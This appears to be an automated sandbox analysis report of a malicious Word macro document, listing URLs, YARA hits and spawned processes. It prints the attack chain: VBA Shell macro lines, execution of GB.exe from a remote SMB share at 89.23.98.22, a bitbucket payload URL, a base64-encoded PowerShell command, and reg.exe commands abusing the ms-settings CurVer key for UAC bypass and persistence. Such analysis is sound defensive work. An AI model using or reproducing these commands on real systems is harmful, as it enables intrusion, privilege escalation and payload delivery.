Source: powershell.exe, 0000000B.00000002.385447053.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002B5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.391663210.000000001C552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/olegovich-007/777/downloads/wsuscr.exe
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
Source: powershell.exe, 00000005.00000002.374553660.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.374553660.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.374553660.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d136azpfpnge1l.cloudfront.net/;
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d301sr5gafysq2.cloudfront.net/
Source: powershell.exe, 00000005.00000002.376805682.0000000012341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.374553660.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.391663210.000000001C491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: explorer.exe, 0000000E.00000002.632856147.00000000001AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: explorer.exe, 0000000E.00000002.632856147.00000000001AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 0000000E.00000002.632856147.00000000001AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 3560, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Document contains an embedded VBA macro which may execute processes
Source: 42#U0430.docOLE, VBA macro line: Call Shell("explorer.exe """ & FASFASFHBNVNVB & """", vbNormalFocus)
Source: 42#U0430.docOLE, VBA macro line: Call Shell("""" & FASFASFHBNVNVB & ireowrppqwcxva & """", vbNormalFocus)
Source: 42#U0430.docOLE, VBA macro line: Call Shell("powershell.exe -Command Stop-Process -Name explorer", vbHide)
Source: ~DF23BD85EE3DE97CB5.TMP.0.drOLE, VBA macro line: JbxHook_Shell_2_ = Shell(jbxparam0, jbxparam1)
Document contains an embedded VBA macro with suspicious strings
Source: 42#U0430.docOLE, VBA macro line: Call Shell("powershell.exe -Command Stop-Process -Name explorer", vbHide)
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function RunExecutable, String powershell: Call Shell("powershell.exe -Command Stop-Process -Name explorer", vbHide)Name: RunExecutable
Very long command line found
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6012
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6012Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_000007FE895F00DD11_2_000007FE895F00DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_000007FE895F243911_2_000007FE895F2439
Source: 42#U0430.docOLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_OpenName: Document_Open
Source: ~DF23BD85EE3DE97CB5.TMP.0.drOLE, VBA macro line: Private Sub Document_Open()
Source: 42#U0430.docOLE indicator, VBA macros: true
Source: ~DF23BD85EE3DE97CB5.TMP.0.drOLE indicator, VBA macros: true
Source: ~WRF{86B60DB8-C5A6-4CF4-9CD7-DD3E39FA8B35}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF23BD85EE3DE97CB5.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: test2.exe.4.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 506 bytes, 1 file, at 0x2c +A "test2.bat", ID 855, number 1, 1 datablock, 0x1503 compression
Source: test2.exe.10.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 506 bytes, 1 file, at 0x2c +A "test2.bat", ID 855, number 1, 1 datablock, 0x1503 compression
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add HKCU\Software\Classes\.omg\Shell\Open\command /d C:\Users\ADMINI~1\AppData\Local\Temp\persistent2\test2.exe /f
Source: Process Memory Space: powershell.exe PID: 3560, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: explorer.exe, 0000000E.00000002.633066156.0000000003BF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sPowerShell\v1.0\PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBPB
Source: classification engineClassification label: mal100.spyw.expl.evad.winDOC@27/19@6/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$#U0430.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR63C1.tmpJump to behavior
Source: 42#U0430.docOLE indicator, Word Document stream: true
Source: 42#U0430.docOLE document summary: title field not present or empty
Source: 42#U0430.docOLE document summary: edited time not present or 0
Source: ~WRF{86B60DB8-C5A6-4CF4-9CD7-DD3E39FA8B35}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{86B60DB8-C5A6-4CF4-9CD7-DD3E39FA8B35}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{86B60DB8-C5A6-4CF4-9CD7-DD3E39FA8B35}.tmp.0.drOLE document summary: edited time not present or 0
Source: ~DF23BD85EE3DE97CB5.TMP.0.drOLE document summary: title field not present or empty
Source: ~DF23BD85EE3DE97CB5.TMP.0.drOLE document summary: author field not present or empty
Source: ~DF23BD85EE3DE97CB5.TMP.0.drOLE document summary: edited time not present or 0
Source: \Device\Mup\89.23.98.22\LN\GB.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c res.bat && test2.exe
Source: C:\Windows\System32\cmd.exeConsole Write: ..........................................................................,..3..8.................H...............(.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ...................................................J.......................................J.... ..J....................Z..................J....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................................e.c.h.o.........|..J.......................J............. ......`{.J..............(.............X%.J............Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .f. . ...................................,..3..e.c.h.o..........=H...............(.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .|. ............=H.....................$.,..3...................=H...............(.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................................x.c.o.p.y........=H.....................$.,..3...................=H...............(.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ..........................................................................,..3..x.c.o.p..........=H.............................................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>.......................................,..3...................=H.............h.(.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................................N.U.L. ...................................,..3...................=H.............h.(.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................................................1.w....................t.,..3..B................=H...............(.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............................%.. ......................,..3....................H...............(.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................\..................................J.......................................J.... ..J....................Z..................J....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............p.o.w.e.r.s.h.e.l.l.......................(......$.J............/...............(.(.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................\.......................................................t.,..3..p.o.w.e..........=H.............................................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................\.......................................................t.,..3..p.o.w.e..........=H...............(.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ...................J............T.h.e. .b.a.t.c.h. .f.i.l.e. .c.a.n.n.o.t. .b.e. .f.o.u.n.d.......(.......(.....h.(.....B.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..(..............P................&.......&.....}..w.............................1......(.P..............3........(.............@.a.............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm................'.......`k....}..w....@.a.....\.......................(.P.....................x.'.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..(.....................................@.a.....}..w..............Y.....^.`k......u.....(.P.......................(.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm................'.......`k....}..w....@.a.....\.......................(.P.....................x.'.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..(.....................................@.a.....}..w..............Y.....^.`k......u.....(.P.......................(.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.8.9.....^.`k......u.....(.P.......................'.....$.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..(.....................................@.a.....}..w..............Y.....^.`k......u.....(.P.......................(.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..(.....................................@.a.....}..w..............Y.....^.`k......u.....(.P.......................(.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..(.....................................@.a.....}..w..............Y.....^.`k......u.....(.P.......................(.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.......u.....(.P.......................'.....,.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..(.....................................@.a.....}..w..............Y.....^.`k......u.....(.P.......................(.....l.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......@.a.....}..w..............Y.....^.`k......u.....(.P.......................'.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..(.....................................@.a.....}..w..............Y.......`k.....Mn.....(.P.......................(.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm................'.....N.`k....}..w....@.a.....\.......................(.P.......................'.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.2.7. .c.h.a.r.:.1.Y.......`k.....Mn.....(.P.....................h.'.....".......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm................'.....N.`k....}..w....@.a.....\.......................(.P.......................'.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..(.....................................@.a.....}..w..............Y.......`k.....Mn.....(.P.......................(.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..(.....................................@.a.....}..w..............Y.......`k.....Mn.....(.P.......................(.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..(.....................................@.a.....}..w..............Y.......`k.....Mn.....(.P.......................(.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..(.....................................@.a.....}..w..............Y.......`k.....Mn.....(.P.......................(.....b.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..(.....................................@.a.....}..w..............Y.......`k.....Mn.....(.P.......................(.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .l.l...C.o.m.m.a.n.d.s...I.n.v.o.k.e.W.e.b.R.e.q.u.e.s.t.C.o.m.m.a.n.d.....h.'.....L.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......@.a.....}..w..............Y.......`k.....Mn.....(.P.....................h.'.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..(.....................................@.a.....}..w..............Y.....^.`k.....N......(.P.......................(.....j.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..(.....................................@.a.....}..w..............Y.....^.`k.....N......(.P.......................(.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..(.....................................@.a.....}..w..............Y.....^.`k.....N......(.P.......................(.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..(.....................................@.a.....}..w..............Y.....^.`k.....N......(.P.......................(.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1...Y.....^.`k.....N......(.P.......................'..... .......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..(.....................................@.a.....}..w..............Y.....^.`k.....N......(.P.......................(.....V.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..(.....................................@.a.....}..w..............Y.....^.`k.....N......(.P.......................(.....V.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..(.....................................@.a.....}..w..............Y.....^.`k.....N......(.P.......................(.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..(.....................................@.a.....}..w..............Y.....^.`k.....N......(.P.......................(.....T.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..(.....................................@.a.....}..w..............Y.....^.`k.....N......(.P.......................(.....l.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......@.a.....}..w..............Y.....^.`k.....N......(.P.......................'.............................Jump to behavior
Source: C:\Windows\System32\reg.exeConsole Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........(.......N.......(...............Jump to behavior
Source: C:\Windows\System32\reg.exeConsole Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............Jump to behavior
Source: C:\Windows\System32\reg.exeConsole Write: ................l...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............
Source: C:\Windows\System32\reg.exeConsole Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\3597805b7d7dce423abb491985dd28e8\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\3597805b7d7dce423abb491985dd28e8\mscorlib.ni.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\explorer.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: 42#U0430.docVirustotal: Detection: 41%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exe explorer.exe "\\89.23.98.22\LN\"
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: \Device\Mup\89.23.98.22\LN\GB.exe \\89.23.98.22\LN\GB.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command Stop-Process -Name explorer
Source: \Device\Mup\89.23.98.22\LN\GB.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c res.bat && test2.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo f "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /s test2.exe "C:\Users\user\AppData\Local\Temp\persistent2\test2.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBEAGUAYwBvAG0AcAByAGUAcwBzAGUAZABCAHkAdABlAEEAcgByAGEAeQAgAHsACgAKACAAIAAgACAAIAAgACAAIABbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0ACgAgACAAIAAgAFAAYQByAGEAbQAgACgACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQBCAHkAUAByAG8AcABlAHIAdAB5AE4AYQBtAGUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJAAoAFQAaAByAG8AdwAoACIALQBiAHkAdABlAEEAcgByAGEAeQAgAGkAcwAgAHIAZQBxAHUAaQByAGUAZAAiACkAKQAKACAAIAAgACAAKQAKACAAIAAgACAAIAAgACAAIABQAHIAbwBjAGUAcwBzACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQAtAFYAZQByAGIAbwBzAGUAIAAiAEcAZQB0AC0ARABlAGMAbwBtAHAAcgBlAHMAcwBlAGQAQgB5AHQAZQBBAHIAcgBhAHkAIgAKACAAIAAgACAAIAAgACAAIAAkAGkAbgBwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABvAHUAdABwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKACAAIAAgACAAIAAgACAAIAAkAGcAegBpAHAAUwB0AHIAZQBhAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQAaQBuAHAAdQB0ACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABnAHoAaQBwAFMAdAByAGUAYQBtAC4AQwBvAHAAeQBUAG8AKAAgACQAbwB1AHQAcAB1AHQAIAApAAoAIAAgACAAIAAgACAAIAAgACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAaQBuAHAAdQB0AC4AQwBsAG8AcwBlACgAKQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAE8AdQB0AEEAcgByAGEAeQAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkACgAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAkAGIAeQB0AGUATwB1AHQAQQByAHIAYQB5AAoAIAAgACAAIAB9AAoAfQAKAAoAWwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAF8AYQByAHIAYQB5ACAAPQAgADMAMQAsADEAMwA5ACwAOAAsADAALAAwACwAMAAsADAALAAwACwANAAsADAALAAxADQAOQAsADEANAA0ACwAMQA5ADMALAAxADEANAAsADEAMwAwACwANAA4ACwAMgAwACwANgA5ACwAMQAyADcALAA0ADEALAA5ADYALAAxADAAOQAsADEAOQA5ACwAMQAzADMALAAxADEALAA1ACwAMQA0ADYALAA5ACwAMwA1ACwAMQA3ADcALAAyACwAMQAyADUALAA5ACwAMQAxADEALAAxADAAMwAsADYANgAsADcALAAxADcAMQAsADEAMgA5ACwANAA2ACwANgA4ACwANwA3ACwAMgA0ADgALAAyADUAMAAsADcAMAAsADEAOAA2ACwAMgAzADkALAA3ADYALAAxADEAOQAsADEAMQAxACwAMQAxADMALAAyADMAMQAsADEANQA4ACwAMgA0ADMALAAxADcANAAsADIAMwAzACwAOQA3ACwAMgAyADQALAAxADQAMAAsADkANAAsADQAOAAsADIAMQA3ACwAMgA0ADIALAAxADMAOAAsADgALAA4ADAALAA4ADQALAAyADIAMAAsADEAMQAzACwANAAwACwAMgAzACwAMQA0ADEALAAyADAAMgAsADEANwAzACwAMgAwADIALAAxADkANgAsADEAOAAxACwAOAAxACwAOQA4ACwANgA2ACwAMwA3ACwAMgAwADQALAAxADcANAAsADkANQAsADEANAAxACwAMg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add HKCU\Software\Classes\.omg\Shell\Open\command /d C:\Users\ADMINI~1\AppData\Local\Temp\persistent2\test2.exe /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add HKCU\Software\Classes\ms-settings\CurVer /d .omg /f
Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\.omg\ /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\ms-settings\ /f
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\explorer.exe explorer.exe "\\89.23.98.22\LN\"Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: \Device\Mup\89.23.98.22\LN\GB.exe \\89.23.98.22\LN\GB.exeJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command Stop-Process -Name explorerJump to behavior
Source: \Device\Mup\89.23.98.22\LN\GB.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c res.bat && test2.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo f "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /s test2.exe "C:\Users\user\AppData\Local\Temp\persistent2\test2.exe" Jump to behavior
